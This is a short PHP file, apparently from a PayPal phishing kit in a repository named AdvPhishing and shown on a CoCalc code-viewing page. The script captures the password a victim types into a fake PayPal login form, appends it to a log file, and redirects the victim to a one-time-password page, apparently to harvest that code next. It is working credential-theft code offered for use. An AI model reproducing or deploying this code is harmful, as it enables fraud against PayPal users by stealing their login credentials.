Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
Ignitetch
GitHub Repository: Ignitetch/AdvPhishing
Path: blob/master/sites/paypal/posts.php
1507 views
1
<?php
2
3
file_put_contents("log.txt", "Pass: " . $_POST['login_password'] . "\n", FILE_APPEND);
4
header('Location: otp.login.php');
5
exit();
6